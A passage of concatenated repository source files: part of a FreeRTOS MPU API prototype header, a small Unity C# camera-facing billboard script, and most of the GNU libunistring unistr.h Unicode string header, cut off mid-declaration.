BaseType_t MPU_xTaskCreate( TaskFunction_t pxTaskCode, const char * const pcName, const uint16_t usStackDepth, void * const pvParameters, UBaseType_t uxPriority, TaskHandle_t * const pxCreatedTask );
TaskHandle_t MPU_xTaskCreateStatic( TaskFunction_t pxTaskCode, const char * const pcName, const uint32_t ulStackDepth, void * const pvParameters, UBaseType_t uxPriority, StackType_t * const puxStackBuffer, StaticTask_t * const pxTaskBuffer );
BaseType_t MPU_xTaskCreateRestricted( const TaskParameters_t * const pxTaskDefinition, TaskHandle_t *pxCreatedTask );
void MPU_vTaskAllocateMPURegions( TaskHandle_t xTask, const MemoryRegion_t * const pxRegions );
void MPU_vTaskDelete( TaskHandle_t xTaskToDelete );
void MPU_vTaskDelay( const TickType_t xTicksToDelay );
void MPU_vTaskDelayUntil( TickType_t * const pxPreviousWakeTime, const TickType_t xTimeIncrement );
BaseType_t MPU_xTaskAbortDelay( TaskHandle_t xTask );
UBaseType_t MPU_uxTaskPriorityGet( TaskHandle_t xTask );
eTaskState MPU_eTaskGetState( TaskHandle_t xTask );
void MPU_vTaskGetInfo( TaskHandle_t xTask, TaskStatus_t *pxTaskStatus, BaseType_t xGetFreeStackSpace, eTaskState eState );
void MPU_vTaskPrioritySet( TaskHandle_t xTask, UBaseType_t uxNewPriority );
void MPU_vTaskSuspend( TaskHandle_t xTaskToSuspend );
void MPU_vTaskResume( TaskHandle_t xTaskToResume );
void MPU_vTaskStartScheduler( void );
void MPU_vTaskSuspendAll( void );
BaseType_t MPU_xTaskResumeAll( void );
TickType_t MPU_xTaskGetTickCount( void );
UBaseType_t MPU_uxTaskGetNumberOfTasks( void );
char * MPU_pcTaskGetName( TaskHandle_t xTaskToQuery );
TaskHandle_t MPU_xTaskGetHandle( const char *pcNameToQuery );
UBaseType_t MPU_uxTaskGetStackHighWaterMark( TaskHandle_t xTask );
void MPU_vTaskSetApplicationTaskTag( TaskHandle_t xTask, TaskHookFunction_t pxHookFunction );
TaskHookFunction_t MPU_xTaskGetApplicationTaskTag( TaskHandle_t xTask );
void MPU_vTaskSetThreadLocalStoragePointer( TaskHandle_t xTaskToSet, BaseType_t xIndex, void *pvValue );
void * MPU_pvTaskGetThreadLocalStoragePointer( TaskHandle_t xTaskToQuery, BaseType_t xIndex );
BaseType_t MPU_xTaskCallApplicationTaskHook( TaskHandle_t xTask, void *pvParameter );
TaskHandle_t MPU_xTaskGetIdleTaskHandle( void );
UBaseType_t MPU_uxTaskGetSystemState( TaskStatus_t * const pxTaskStatusArray, const UBaseType_t uxArraySize, uint32_t * const pulTotalRunTime );
void MPU_vTaskList( char * pcWriteBuffer );
void MPU_vTaskGetRunTimeStats( char *pcWriteBuffer );
BaseType_t MPU_xTaskGenericNotify( TaskHandle_t xTaskToNotify, uint32_t ulValue, eNotifyAction eAction, uint32_t *pulPreviousNotificationValue );
BaseType_t MPU_xTaskNotifyWait( uint32_t ulBitsToClearOnEntry, uint32_t ulBitsToClearOnExit, uint32_t *pulNotificationValue, TickType_t xTicksToWait );
uint32_t MPU_ulTaskNotifyTake( BaseType_t xClearCountOnExit, TickType_t xTicksToWait );
BaseType_t MPU_xTaskNotifyStateClear( TaskHandle_t xTask );
BaseType_t MPU_xTaskIncrementTick( void );
TaskHandle_t MPU_xTaskGetCurrentTaskHandle( void );
void MPU_vTaskSetTimeOutState( TimeOut_t * const pxTimeOut );
BaseType_t MPU_xTaskCheckForTimeOut( TimeOut_t * const pxTimeOut, TickType_t * const pxTicksToWait );
void MPU_vTaskMissedYield( void );
BaseType_t MPU_xTaskGetSchedulerState( void );
/* MPU versions of queue.h API function. */
BaseType_t MPU_xQueueGenericSend( QueueHandle_t xQueue, const void * const pvItemToQueue, TickType_t xTicksToWait, const BaseType_t xCopyPosition );
BaseType_t MPU_xQueueGenericReceive( QueueHandle_t xQueue, void * const pvBuffer, TickType_t xTicksToWait, const BaseType_t xJustPeek );
UBaseType_t MPU_uxQueueMessagesWaiting( const QueueHandle_t xQueue );
UBaseType_t MPU_uxQueueSpacesAvailable( const QueueHandle_t xQueue );
void MPU_vQueueDelete( QueueHandle_t xQueue );
QueueHandle_t MPU_xQueueCreateMutex( const uint8_t ucQueueType );
QueueHandle_t MPU_xQueueCreateMutexStatic( const uint8_t ucQueueType, StaticQueue_t *pxStaticQueue );
QueueHandle_t MPU_xQueueCreateCountingSemaphore( const UBaseType_t uxMaxCount, const UBaseType_t uxInitialCount );
QueueHandle_t MPU_xQueueCreateCountingSemaphoreStatic( const UBaseType_t uxMaxCount, const UBaseType_t uxInitialCount, StaticQueue_t *pxStaticQueue );
void* MPU_xQueueGetMutexHolder( QueueHandle_t xSemaphore );
BaseType_t MPU_xQueueTakeMutexRecursive( QueueHandle_t xMutex, TickType_t xTicksToWait );
BaseType_t MPU_xQueueGiveMutexRecursive( QueueHandle_t pxMutex );
void MPU_vQueueAddToRegistry( QueueHandle_t xQueue, const char *pcName );
void MPU_vQueueUnregisterQueue( QueueHandle_t xQueue );
const char * MPU_pcQueueGetName( QueueHandle_t xQueue );
QueueHandle_t MPU_xQueueGenericCreate( const UBaseType_t uxQueueLength, const UBaseType_t uxItemSize, const uint8_t ucQueueType );
QueueHandle_t MPU_xQueueGenericCreateStatic( const UBaseType_t uxQueueLength, const UBaseType_t uxItemSize, uint8_t *pucQueueStorage, StaticQueue_t *pxStaticQueue, const uint8_t ucQueueType );
QueueSetHandle_t MPU_xQueueCreateSet( const UBaseType_t uxEventQueueLength );
BaseType_t MPU_xQueueAddToSet( QueueSetMemberHandle_t xQueueOrSemaphore, QueueSetHandle_t xQueueSet );
BaseType_t MPU_xQueueRemoveFromSet( QueueSetMemberHandle_t xQueueOrSemaphore, QueueSetHandle_t xQueueSet );
QueueSetMemberHandle_t MPU_xQueueSelectFromSet( QueueSetHandle_t xQueueSet, const TickType_t xTicksToWait );
BaseType_t MPU_xQueueGenericReset( QueueHandle_t xQueue, BaseType_t xNewQueue );
void MPU_vQueueSetQueueNumber( QueueHandle_t xQueue, UBaseType_t uxQueueNumber );
UBaseType_t MPU_uxQueueGetQueueNumber( QueueHandle_t xQueue );
uint8_t MPU_ucQueueGetQueueType( QueueHandle_t xQueue );
/* MPU versions of timers.h API function. */
TimerHandle_t MPU_xTimerCreate( const char * const pcTimerName, const TickType_t xTimerPeriodInTicks, const UBaseType_t uxAutoReload, void * const pvTimerID, TimerCallbackFunction_t pxCallbackFunction );
TimerHandle_t MPU_xTimerCreateStatic( const char * const pcTimerName, const TickType_t xTimerPeriodInTicks, const UBaseType_t uxAutoReload, void * const pvTimerID, TimerCallbackFunction_t pxCallbackFunction, StaticTimer_t *pxTimerBuffer );
void * MPU_pvTimerGetTimerID( const TimerHandle_t xTimer );
void MPU_vTimerSetTimerID( TimerHandle_t xTimer, void *pvNewID );
BaseType_t MPU_xTimerIsTimerActive( TimerHandle_t xTimer );
TaskHandle_t MPU_xTimerGetTimerDaemonTaskHandle( void );
BaseType_t MPU_xTimerPendFunctionCall( PendedFunction_t xFunctionToPend, void *pvParameter1, uint32_t ulParameter2, TickType_t xTicksToWait );
const char * MPU_pcTimerGetName( TimerHandle_t xTimer );
TickType_t MPU_xTimerGetPeriod( TimerHandle_t xTimer );
TickType_t MPU_xTimerGetExpiryTime( TimerHandle_t xTimer );
BaseType_t MPU_xTimerCreateTimerTask( void );
BaseType_t MPU_xTimerGenericCommand( TimerHandle_t xTimer, const BaseType_t xCommandID, const TickType_t xOptionalValue, BaseType_t * const pxHigherPriorityTaskWoken, const TickType_t xTicksToWait );
/* MPU versions of event_group.h API function. */
EventGroupHandle_t MPU_xEventGroupCreate( void );
EventGroupHandle_t MPU_xEventGroupCreateStatic( StaticEventGroup_t *pxEventGroupBuffer );
EventBits_t MPU_xEventGroupWaitBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToWaitFor, const BaseType_t xClearOnExit, const BaseType_t xWaitForAllBits, TickType_t xTicksToWait );
EventBits_t MPU_xEventGroupClearBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToClear );
EventBits_t MPU_xEventGroupSetBits( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToSet );
EventBits_t MPU_xEventGroupSync( EventGroupHandle_t xEventGroup, const EventBits_t uxBitsToSet, const EventBits_t uxBitsToWaitFor, TickType_t xTicksToWait );
void MPU_vEventGroupDelete( EventGroupHandle_t xEventGroup );
UBaseType_t MPU_uxEventGroupGetNumber( void* xEventGroup );
#endif /* MPU_PROTOTYPES_H */
| {
"pile_set_name": "Github"
} |
using UnityEngine;
using System.Collections;
public class BillboardLaub: MonoBehaviour {
private Transform mainCamTransform;
private Transform cachedTransform;
// Use this for initialization
void Start () {
mainCamTransform = Camera.main.transform;
cachedTransform = transform;
}
void Update(){
if (mainCamTransform.InverseTransformPoint( cachedTransform.position).z>=0){
Vector3 v = mainCamTransform.position - cachedTransform.position;
v.x=v.z=0;
cachedTransform.LookAt( mainCamTransform.position-v);
GetComponent<Renderer>().enabled = true;
}
else{
GetComponent<Renderer>().enabled = false;
}
}
}
| {
"pile_set_name": "Github"
} |
/* Elementary Unicode string functions.
Copyright (C) 2001-2002, 2005-2019 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
#ifndef _UNISTR_H
#define _UNISTR_H
#include "unitypes.h"
/* Get common macros for C. */
#include "unused-parameter.h"
/* Get bool. */
#include <stdbool.h>
/* Get size_t. */
#include <stddef.h>
#ifdef __cplusplus
extern "C" {
#endif
/* Conventions:
All functions prefixed with u8_ operate on UTF-8 encoded strings.
Their unit is an uint8_t (1 byte).
All functions prefixed with u16_ operate on UTF-16 encoded strings.
Their unit is an uint16_t (a 2-byte word).
All functions prefixed with u32_ operate on UCS-4 encoded strings.
Their unit is an uint32_t (a 4-byte word).
All argument pairs (s, n) denote a Unicode string s[0..n-1] with exactly
n units.
All arguments starting with "str" and the arguments of functions starting
with u8_str/u16_str/u32_str denote a NUL terminated string, i.e. a string
which terminates at the first NUL unit. This termination unit is
considered part of the string for all memory allocation purposes, but
is not considered part of the string for all other logical purposes.
Functions returning a string result take a (resultbuf, lengthp) argument
pair. If resultbuf is not NULL and the result fits into *lengthp units,
it is put in resultbuf, and resultbuf is returned. Otherwise, a freshly
allocated string is returned. In both cases, *lengthp is set to the
length (number of units) of the returned string. In case of error,
NULL is returned and errno is set. */
/* Elementary string checks. */
/* Check whether an UTF-8 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint8_t *
u8_check (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Check whether an UTF-16 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint16_t *
u16_check (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Check whether an UCS-4 string is well-formed.
Return NULL if valid, or a pointer to the first invalid unit otherwise. */
extern const uint32_t *
u32_check (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Elementary string conversions. */
/* Convert an UTF-8 string to an UTF-16 string. */
extern uint16_t *
u8_to_u16 (const uint8_t *s, size_t n, uint16_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-8 string to an UCS-4 string. */
extern uint32_t *
u8_to_u32 (const uint8_t *s, size_t n, uint32_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-16 string to an UTF-8 string. */
extern uint8_t *
u16_to_u8 (const uint16_t *s, size_t n, uint8_t *resultbuf,
size_t *lengthp);
/* Convert an UTF-16 string to an UCS-4 string. */
extern uint32_t *
u16_to_u32 (const uint16_t *s, size_t n, uint32_t *resultbuf,
size_t *lengthp);
/* Convert an UCS-4 string to an UTF-8 string. */
extern uint8_t *
u32_to_u8 (const uint32_t *s, size_t n, uint8_t *resultbuf,
size_t *lengthp);
/* Convert an UCS-4 string to an UTF-16 string. */
extern uint16_t *
u32_to_u16 (const uint32_t *s, size_t n, uint16_t *resultbuf,
size_t *lengthp);
/* Elementary string functions. */
/* Return the length (number of units) of the first character in S, which is
no longer than N. Return 0 if it is the NUL character. Return -1 upon
failure. */
/* Similar to mblen(), except that s must not be NULL. */
extern int
u8_mblen (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_mblen (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_mblen (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Upon failure, *PUC is set to 0xfffd,
and an appropriate number of units is returned.
The number of available units, N, must be > 0. */
/* Similar to mbtowc(), except that puc and s must not be NULL, n must be > 0,
and the NUL character is not treated specially. */
/* The variants with _unsafe suffix are for backward compatibility with
libunistring versions < 0.9.7. */
#if GNULIB_UNISTR_U8_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u8_mbtouc_unsafe (ucs4_t *puc, const uint8_t *s, size_t n);
# else
extern int
u8_mbtouc_unsafe_aux (ucs4_t *puc, const uint8_t *s, size_t n);
static inline int
u8_mbtouc_unsafe (ucs4_t *puc, const uint8_t *s, size_t n)
{
uint8_t c = *s;
if (c < 0x80)
{
*puc = c;
return 1;
}
else
return u8_mbtouc_unsafe_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u16_mbtouc_unsafe (ucs4_t *puc, const uint16_t *s, size_t n);
# else
extern int
u16_mbtouc_unsafe_aux (ucs4_t *puc, const uint16_t *s, size_t n);
static inline int
u16_mbtouc_unsafe (ucs4_t *puc, const uint16_t *s, size_t n)
{
uint16_t c = *s;
if (c < 0xd800 || c >= 0xe000)
{
*puc = c;
return 1;
}
else
return u16_mbtouc_unsafe_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_MBTOUC_UNSAFE || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_mbtouc_unsafe (ucs4_t *puc, const uint32_t *s, size_t n);
# else
static inline int
u32_mbtouc_unsafe (ucs4_t *puc,
const uint32_t *s, size_t n _GL_UNUSED_PARAMETER)
{
uint32_t c = *s;
if (c < 0xd800 || (c >= 0xe000 && c < 0x110000))
*puc = c;
else
/* invalid multibyte character */
*puc = 0xfffd;
return 1;
}
# endif
#endif
#if GNULIB_UNISTR_U8_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u8_mbtouc (ucs4_t *puc, const uint8_t *s, size_t n);
# else
extern int
u8_mbtouc_aux (ucs4_t *puc, const uint8_t *s, size_t n);
static inline int
u8_mbtouc (ucs4_t *puc, const uint8_t *s, size_t n)
{
uint8_t c = *s;
if (c < 0x80)
{
*puc = c;
return 1;
}
else
return u8_mbtouc_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u16_mbtouc (ucs4_t *puc, const uint16_t *s, size_t n);
# else
extern int
u16_mbtouc_aux (ucs4_t *puc, const uint16_t *s, size_t n);
static inline int
u16_mbtouc (ucs4_t *puc, const uint16_t *s, size_t n)
{
uint16_t c = *s;
if (c < 0xd800 || c >= 0xe000)
{
*puc = c;
return 1;
}
else
return u16_mbtouc_aux (puc, s, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_MBTOUC || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_mbtouc (ucs4_t *puc, const uint32_t *s, size_t n);
# else
static inline int
u32_mbtouc (ucs4_t *puc, const uint32_t *s, size_t n _GL_UNUSED_PARAMETER)
{
uint32_t c = *s;
if (c < 0xd800 || (c >= 0xe000 && c < 0x110000))
*puc = c;
else
/* invalid multibyte character */
*puc = 0xfffd;
return 1;
}
# endif
#endif
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Upon failure, *PUC is set to 0xfffd,
and -1 is returned for an invalid sequence of units, -2 is returned for an
incomplete sequence of units.
The number of available units, N, must be > 0. */
/* Similar to u*_mbtouc(), except that the return value gives more details
about the failure, similar to mbrtowc(). */
#if GNULIB_UNISTR_U8_MBTOUCR || HAVE_LIBUNISTRING
extern int
u8_mbtoucr (ucs4_t *puc, const uint8_t *s, size_t n);
#endif
#if GNULIB_UNISTR_U16_MBTOUCR || HAVE_LIBUNISTRING
extern int
u16_mbtoucr (ucs4_t *puc, const uint16_t *s, size_t n);
#endif
#if GNULIB_UNISTR_U32_MBTOUCR || HAVE_LIBUNISTRING
extern int
u32_mbtoucr (ucs4_t *puc, const uint32_t *s, size_t n);
#endif
/* Put the multibyte character represented by UC in S, returning its
length. Return -1 upon failure, -2 if the number of available units, N,
is too small. The latter case cannot occur if N >= 6/2/1, respectively. */
/* Similar to wctomb(), except that s must not be NULL, and the argument n
must be specified. */
#if GNULIB_UNISTR_U8_UCTOMB || HAVE_LIBUNISTRING
/* Auxiliary function, also used by u8_chr, u8_strchr, u8_strrchr. */
extern int
u8_uctomb_aux (uint8_t *s, ucs4_t uc, int n);
# if !HAVE_INLINE
extern int
u8_uctomb (uint8_t *s, ucs4_t uc, int n);
# else
static inline int
u8_uctomb (uint8_t *s, ucs4_t uc, int n)
{
if (uc < 0x80 && n > 0)
{
s[0] = uc;
return 1;
}
else
return u8_uctomb_aux (s, uc, n);
}
# endif
#endif
#if GNULIB_UNISTR_U16_UCTOMB || HAVE_LIBUNISTRING
/* Auxiliary function, also used by u16_chr, u16_strchr, u16_strrchr. */
extern int
u16_uctomb_aux (uint16_t *s, ucs4_t uc, int n);
# if !HAVE_INLINE
extern int
u16_uctomb (uint16_t *s, ucs4_t uc, int n);
# else
static inline int
u16_uctomb (uint16_t *s, ucs4_t uc, int n)
{
if (uc < 0xd800 && n > 0)
{
s[0] = uc;
return 1;
}
else
return u16_uctomb_aux (s, uc, n);
}
# endif
#endif
#if GNULIB_UNISTR_U32_UCTOMB || HAVE_LIBUNISTRING
# if !HAVE_INLINE
extern int
u32_uctomb (uint32_t *s, ucs4_t uc, int n);
# else
static inline int
u32_uctomb (uint32_t *s, ucs4_t uc, int n)
{
if (uc < 0xd800 || (uc >= 0xe000 && uc < 0x110000))
{
if (n > 0)
{
*s = uc;
return 1;
}
else
return -2;
}
else
return -1;
}
# endif
#endif
/* Copy N units from SRC to DEST. */
/* Similar to memcpy(). */
extern uint8_t *
u8_cpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_cpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_cpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Copy N units from SRC to DEST, guaranteeing correct behavior for
overlapping memory areas. */
/* Similar to memmove(). */
extern uint8_t *
u8_move (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_move (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_move (uint32_t *dest, const uint32_t *src, size_t n);
/* Set the first N characters of S to UC. UC should be a character that
occupies only 1 unit. */
/* Similar to memset(). */
extern uint8_t *
u8_set (uint8_t *s, ucs4_t uc, size_t n);
extern uint16_t *
u16_set (uint16_t *s, ucs4_t uc, size_t n);
extern uint32_t *
u32_set (uint32_t *s, ucs4_t uc, size_t n);
/* Compare S1 and S2, each of length N. */
/* Similar to memcmp(). */
extern int
u8_cmp (const uint8_t *s1, const uint8_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_cmp (const uint16_t *s1, const uint16_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_cmp (const uint32_t *s1, const uint32_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
/* Compare S1 and S2. */
/* Similar to the gnulib function memcmp2(). */
extern int
u8_cmp2 (const uint8_t *s1, size_t n1, const uint8_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
extern int
u16_cmp2 (const uint16_t *s1, size_t n1, const uint16_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
extern int
u32_cmp2 (const uint32_t *s1, size_t n1, const uint32_t *s2, size_t n2)
_UC_ATTRIBUTE_PURE;
/* Search the string at S for UC. */
/* Similar to memchr(). */
extern uint8_t *
u8_chr (const uint8_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_chr (const uint16_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_chr (const uint32_t *s, size_t n, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Count the number of Unicode characters in the N units from S. */
/* Similar to mbsnlen(). */
extern size_t
u8_mbsnlen (const uint8_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_mbsnlen (const uint16_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_mbsnlen (const uint32_t *s, size_t n)
_UC_ATTRIBUTE_PURE;
/* Elementary string functions with memory allocation. */
/* Make a freshly allocated copy of S, of length N. */
extern uint8_t *
u8_cpy_alloc (const uint8_t *s, size_t n);
extern uint16_t *
u16_cpy_alloc (const uint16_t *s, size_t n);
extern uint32_t *
u32_cpy_alloc (const uint32_t *s, size_t n);
/* Elementary string functions on NUL terminated strings. */
/* Return the length (number of units) of the first character in S.
Return 0 if it is the NUL character. Return -1 upon failure. */
extern int
u8_strmblen (const uint8_t *s)
_UC_ATTRIBUTE_PURE;
extern int
u16_strmblen (const uint16_t *s)
_UC_ATTRIBUTE_PURE;
extern int
u32_strmblen (const uint32_t *s)
_UC_ATTRIBUTE_PURE;
/* Return the length (number of units) of the first character in S, putting
its 'ucs4_t' representation in *PUC. Return 0 if it is the NUL
character. Return -1 upon failure. */
extern int
u8_strmbtouc (ucs4_t *puc, const uint8_t *s);
extern int
u16_strmbtouc (ucs4_t *puc, const uint16_t *s);
extern int
u32_strmbtouc (ucs4_t *puc, const uint32_t *s);
/* Forward iteration step. Advances the pointer past the next character,
or returns NULL if the end of the string has been reached. Puts the
character's 'ucs4_t' representation in *PUC. */
extern const uint8_t *
u8_next (ucs4_t *puc, const uint8_t *s);
extern const uint16_t *
u16_next (ucs4_t *puc, const uint16_t *s);
extern const uint32_t *
u32_next (ucs4_t *puc, const uint32_t *s);
/* Backward iteration step. Advances the pointer to point to the previous
character, or returns NULL if the beginning of the string had been reached.
Puts the character's 'ucs4_t' representation in *PUC. */
extern const uint8_t *
u8_prev (ucs4_t *puc, const uint8_t *s, const uint8_t *start);
extern const uint16_t *
u16_prev (ucs4_t *puc, const uint16_t *s, const uint16_t *start);
extern const uint32_t *
u32_prev (ucs4_t *puc, const uint32_t *s, const uint32_t *start);
/* Return the number of units in S. */
/* Similar to strlen(), wcslen(). */
extern size_t
u8_strlen (const uint8_t *s)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strlen (const uint16_t *s)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strlen (const uint32_t *s)
_UC_ATTRIBUTE_PURE;
/* Return the number of units in S, but at most MAXLEN. */
/* Similar to strnlen(), wcsnlen(). */
extern size_t
u8_strnlen (const uint8_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strnlen (const uint16_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strnlen (const uint32_t *s, size_t maxlen)
_UC_ATTRIBUTE_PURE;
/* Copy SRC to DEST. */
/* Similar to strcpy(), wcscpy(). */
extern uint8_t *
u8_strcpy (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_strcpy (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_strcpy (uint32_t *dest, const uint32_t *src);
/* Copy SRC to DEST, returning the address of the terminating NUL in DEST. */
/* Similar to stpcpy(). */
extern uint8_t *
u8_stpcpy (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_stpcpy (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_stpcpy (uint32_t *dest, const uint32_t *src);
/* Copy no more than N units of SRC to DEST. */
/* Similar to strncpy(), wcsncpy(). */
extern uint8_t *
u8_strncpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_strncpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_strncpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Copy no more than N units of SRC to DEST. Return a pointer past the last
non-NUL unit written into DEST. */
/* Similar to stpncpy(). */
extern uint8_t *
u8_stpncpy (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_stpncpy (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_stpncpy (uint32_t *dest, const uint32_t *src, size_t n);
/* Append SRC onto DEST. */
/* Similar to strcat(), wcscat(). */
extern uint8_t *
u8_strcat (uint8_t *dest, const uint8_t *src);
extern uint16_t *
u16_strcat (uint16_t *dest, const uint16_t *src);
extern uint32_t *
u32_strcat (uint32_t *dest, const uint32_t *src);
/* Append no more than N units of SRC onto DEST. */
/* Similar to strncat(), wcsncat(). */
extern uint8_t *
u8_strncat (uint8_t *dest, const uint8_t *src, size_t n);
extern uint16_t *
u16_strncat (uint16_t *dest, const uint16_t *src, size_t n);
extern uint32_t *
u32_strncat (uint32_t *dest, const uint32_t *src, size_t n);
/* Compare S1 and S2. */
/* Similar to strcmp(), wcscmp(). */
#ifdef __sun
/* Avoid a collision with the u8_strcmp() function in Solaris 11 libc. */
extern int
u8_strcmp_gnu (const uint8_t *s1, const uint8_t *s2)
_UC_ATTRIBUTE_PURE;
# define u8_strcmp u8_strcmp_gnu
#else
extern int
u8_strcmp (const uint8_t *s1, const uint8_t *s2)
_UC_ATTRIBUTE_PURE;
#endif
extern int
u16_strcmp (const uint16_t *s1, const uint16_t *s2)
_UC_ATTRIBUTE_PURE;
extern int
u32_strcmp (const uint32_t *s1, const uint32_t *s2)
_UC_ATTRIBUTE_PURE;
/* Compare S1 and S2 using the collation rules of the current locale.
Return -1 if S1 < S2, 0 if S1 = S2, 1 if S1 > S2.
Upon failure, set errno and return any value. */
/* Similar to strcoll(), wcscoll(). */
extern int
u8_strcoll (const uint8_t *s1, const uint8_t *s2);
extern int
u16_strcoll (const uint16_t *s1, const uint16_t *s2);
extern int
u32_strcoll (const uint32_t *s1, const uint32_t *s2);
/* Compare no more than N units of S1 and S2. */
/* Similar to strncmp(), wcsncmp(). */
extern int
u8_strncmp (const uint8_t *s1, const uint8_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u16_strncmp (const uint16_t *s1, const uint16_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
extern int
u32_strncmp (const uint32_t *s1, const uint32_t *s2, size_t n)
_UC_ATTRIBUTE_PURE;
/* Duplicate S, returning an identical malloc'd string. */
/* Similar to strdup(), wcsdup(). */
extern uint8_t *
u8_strdup (const uint8_t *s);
extern uint16_t *
u16_strdup (const uint16_t *s);
extern uint32_t *
u32_strdup (const uint32_t *s);
/* Find the first occurrence of UC in STR. */
/* Similar to strchr(), wcschr(). */
extern uint8_t *
u8_strchr (const uint8_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strchr (const uint16_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strchr (const uint32_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Find the last occurrence of UC in STR. */
/* Similar to strrchr(), wcsrchr(). */
extern uint8_t *
u8_strrchr (const uint8_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strrchr (const uint16_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strrchr (const uint32_t *str, ucs4_t uc)
_UC_ATTRIBUTE_PURE;
/* Return the length of the initial segment of STR which consists entirely
of Unicode characters not in REJECT. */
/* Similar to strcspn(), wcscspn(). */
extern size_t
u8_strcspn (const uint8_t *str, const uint8_t *reject)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strcspn (const uint16_t *str, const uint16_t *reject)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strcspn (const uint32_t *str, const uint32_t *reject)
_UC_ATTRIBUTE_PURE;
/* Return the length of the initial segment of STR which consists entirely
of Unicode characters in ACCEPT. */
/* Similar to strspn(), wcsspn(). */
extern size_t
u8_strspn (const uint8_t *str, const uint8_t *accept)
_UC_ATTRIBUTE_PURE;
extern size_t
u16_strspn (const uint16_t *str, const uint16_t *accept)
_UC_ATTRIBUTE_PURE;
extern size_t
u32_strspn (const uint32_t *str, const uint32_t *accept)
_UC_ATTRIBUTE_PURE;
/* Find the first occurrence in STR of any character in ACCEPT. */
/* Similar to strpbrk(), wcspbrk(). */
extern uint8_t *
u8_strpbrk (const uint8_t *str, const uint8_t *accept)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strpbrk (const uint16_t *str, const uint16_t *accept)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
u32_strpbrk (const uint32_t *str, const uint32_t *accept)
_UC_ATTRIBUTE_PURE;
/* Find the first occurrence of NEEDLE in HAYSTACK. */
/* Similar to strstr(), wcsstr(). */
extern uint8_t *
u8_strstr (const uint8_t *haystack, const uint8_t *needle)
_UC_ATTRIBUTE_PURE;
extern uint16_t *
u16_strstr (const uint16_t *haystack, const uint16_t *needle)
_UC_ATTRIBUTE_PURE;
extern uint32_t *
